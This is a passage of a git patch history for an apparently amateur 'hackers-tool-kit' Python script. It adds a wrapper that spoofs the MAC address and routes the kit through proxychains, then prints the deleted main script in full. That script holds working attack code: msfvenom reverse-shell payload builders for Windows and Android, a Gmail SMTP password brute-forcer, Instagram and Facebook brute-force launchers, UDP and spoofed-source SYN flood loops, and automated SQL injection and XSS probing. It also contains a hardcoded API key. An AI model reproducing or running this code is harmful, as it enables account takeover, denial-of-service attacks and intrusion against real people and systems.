os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arppois": + appois() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + found = True +mainbanner() +main() diff --git a/htksecure.py b/htksecure.py new file mode 100644 index 0000000..eeac98f --- /dev/null +++ b/htksecure.py @@ -0,0 +1,39 @@ +import os +import sys +print "--------------------------------------------------------------------------------------------------" +print """\033[93m!WELCOME TO THE SECURE VERSION OF HACKERS-TOOL-IT WHAT THIS MEANS IS THAT +THE HACKERS-TOOL-KIT WILL BE RUN WITH PROXYCHAINS AND OTHER TOOLS MAKING YOU NEAR ANONYMOUS EXITING +THE TERMINAL SHOULD STOP THE PROXYCHAINS NOTE SOME STUFF MIGHT NOT WORK OR MIGHT BE SLOW DUE TO THE +PROXYCHAINS YOU HAVE TO HAVE YOUR PROXYCHAINS CONFIG FILE ALREADY SETUP TO USE THIS!\033[0m""" +print "--------------------------------------------------------------------------------------------------" +print "\n" +print "\033[92mWould you like to continue? y or n\033[0m" +h = raw_input("?: ") +if h == "n": + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() +if h == "y": + print "\033[93m------------------------\033[0m" + print "\nSTARTING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) + show = 'macchanger -s {0}'.format(k) + os.system(show) + print "\nSTARTING HTK WITH PROXYCHAINS\n" + os.system("proxychains python /root/hackers-tool-kit/htk.py") + print "\033[93m------------------------\033[0m" + print "\nSTOPPING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) From 63574613a4301d9d1bc40d4c31d256cc6395df4f Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 20 Mar 2019 02:20:12 +0100 Subject: [PATCH 048/214] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 921bfea..4fff524 100644 --- a/README.md +++ b/README.md @@ -26,7 +26,7 @@ my instagram @unkn0wn_bali ![](tools/screenshot4.png) -the htksecure.py file will run the hackers-tool-kit with proxychains making you anonymous when hacking but some stuff might be slow or not work... to run htk secure look below +the htksecure.py file will run the hackers-tool-kit with proxychains and other tools making you anonymous when hacking but some stuff might be slow or not work... to run htk secure look below * cd hackers-tool-kit From c06dc977cf3fe23197ebb777386e33ca4a72ad3b Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 20 Mar 2019 02:20:57 +0100 Subject: [PATCH 049/214] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4fff524..1cacf76 100644 --- a/README.md +++ b/README.md @@ -28,6 +28,6 @@ my instagram @unkn0wn_bali the htksecure.py file will run the hackers-tool-kit with proxychains and other tools making you anonymous when hacking but some stuff might be slow or not work... to run htk secure look below -* cd hackers-tool-kit +* `cd hackers-tool-kit -* python htksecure.py +* `python htksecure.py From 54b111dc696d5c2aeb8e6f87599eb287d48921b5 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 20 Mar 2019 02:21:20 +0100 Subject: [PATCH 050/214] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 1cacf76..e0fd5c3 100644 --- a/README.md +++ b/README.md @@ -28,6 +28,6 @@ my instagram @unkn0wn_bali the htksecure.py file will run the hackers-tool-kit with proxychains and other tools making you anonymous when hacking but some stuff might be slow or not work... to run htk secure look below -* `cd hackers-tool-kit +* `cd hackers-tool-kit` -* `python htksecure.py +* `python htksecure.py` From 2144ffe9e0b5f43974a8609acd1eff4878c2c819 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 24 Mar 2019 19:22:18 +0100 Subject: [PATCH 051/214] Delete htk.py --- htk.py | 2023 -------------------------------------------------------- 1 file changed, 2023 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 8d36411..0000000 --- a/htk.py +++ /dev/null @@ -1,2023 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to edit this script without my credit -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn TIP: "ctrl c" usually stops a script if you dont want to keep running it -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal -arppois : ARP poisoning -sslscan : ssl scan a host -payload : make a metasploit payload of your choice -crunch : Make wordlists -traff : shows your internet traffic -resa : reset account password -resu : reset unix password -hashid : find the type of hash of a hash -wafwoof : check a web application for firewall -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - os.system("iwconfig") - os.system("neofetch") - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - show = 'macchanger -s {0}'.format(k) - os.system(show) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] 